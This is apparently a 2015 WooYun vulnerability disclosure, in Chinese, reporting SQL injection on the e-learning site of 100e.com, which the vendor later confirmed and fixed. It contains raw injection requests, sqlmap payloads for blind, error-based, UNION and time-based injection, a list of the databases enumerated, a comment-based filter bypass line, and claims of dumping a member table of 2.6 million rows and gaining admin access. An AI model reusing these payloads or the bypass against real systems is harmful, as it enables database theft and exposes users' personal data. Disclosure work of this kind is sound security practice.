当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-093134

漏洞标题:一百易多处SQL注射泄露大量用户信息

相关厂商:100e.com

漏洞作者: 路人甲

提交时间:2015-01-22 11:02

修复时间:2015-03-08 11:04

公开时间:2015-03-08 11:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-22: 细节已通知厂商并且等待厂商处理中
2015-01-23: 厂商已经确认,细节仅向厂商公开
2015-02-02: 细节向核心白帽子及相关领域专家公开
2015-02-12: 细节向普通白帽子公开
2015-02-22: 细节向实习白帽子公开
2015-03-08: 细节向公众公开

简要描述:

233

详细说明:

http://elearning.100e.com/lvword/AddToMyLib.asp?LetterLevel=0&PageNo=6&WordLevel=

1e1.jpg


1e2.jpg


2处post型
POST /lvword/ApplyAdd.asp HTTP/1.1
Content-Length: 182
Content-Type: application/x-www-form-urlencoded
Referer: http://elearning.100e.com/
Cookie: ASPSESSIONIDCARRTSAD=CCNPACLCANHADHOLLBHMDLCG
Host: elearning.100e.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Slct_WordID=%5c&Slct_WordID=1038&Slct_WordID=1923&Slct_WordID=1739&Slct_WordID=1738&Slct_WordID=1690&Slct_WordID=2043&Slct_WordID=1679&Slct_WordID=1619&Slct_WordID=999&User=100eGuest
-------------
POST /lvWord/ApplyDel.asp HTTP/1.1
Content-Length: 25
Content-Type: application/x-www-form-urlencoded
Referer: http://elearning.100e.com/
Cookie: ASPSESSIONIDCARRTSAD=CCNPACLCANHADHOLLBHMDLCG
Host: elearning.100e.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Delete=%5c&user=100eGuest

漏洞证明:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: WordLevel
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: LetterLevel=0&PageNo=6&WordLevel=-9134' OR (1585=1585)#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: LetterLevel=0&PageNo=6&WordLevel=' AND (SELECT 4947 FROM(SELECT COUNT(*),CONCAT(0x7165746571,(SELECT (CASE WHEN (4947=4947) THEN 1 ELSE 0 END)),0x71787a6d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ZeHm'='ZeHm
Type: UNION query
Title: MySQL UNION query (NULL) - 5 columns
Payload: LetterLevel=0&PageNo=6&WordLevel=' UNION ALL SELECT NULL,CONCAT(0x7165746571,0x41765065585877547578,0x71787a6d71),NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: LetterLevel=0&PageNo=6&WordLevel=' AND 7649=BENCHMARK(5000000,MD5(0x77536462)) AND 'dqTB'='dqTB
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: MySQL 5.0
available databases [26]:
[*] 100eDB
[*] 100eDB2
[*] 100eZone
[*] Admin
[*] AppendDB
[*] Book
[*] Chat7
[*] Chat7_Log
[*] Client
[*] ClientLog
[*] Course
[*] Edu
[*] FileService
[*] Group
[*] information_schema
[*] IPLocation
[*] mysql
[*] School
[*] Tag
[*] TEC
[*] TemporaryDB
[*] test
[*] User
[*] VC2008
[*] VC6
[*] VC7
----------------
泄露的信息有,用户,加盟用户,还有第三方信息。
看下mymenber:
select count(*) from mymember: '262 6446' 262万用户数据
dump其他表查看的时候正常,就是dump mymenber这个表的时候就被禁止连接了,
明显是做了入库前检查,但是。。。。
payload= "%s /*!30%s%s*/%s" % (payload[:payload.find(' ')], randomInt(3), payload[payload.find(' ') + 1:], postfix)
成功绕过。。。。
拿到管理后,发现管理的权限都不尽相同。
贴一个图:

100e1.jpg

修复方案:

1,建议检查全站,问题比较多。
2,求20rank!!!

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-01-23 10:07

厂商回复:

谢谢,马上修复。

最新状态:

2015-01-23:已经修复


漏洞评价:

评论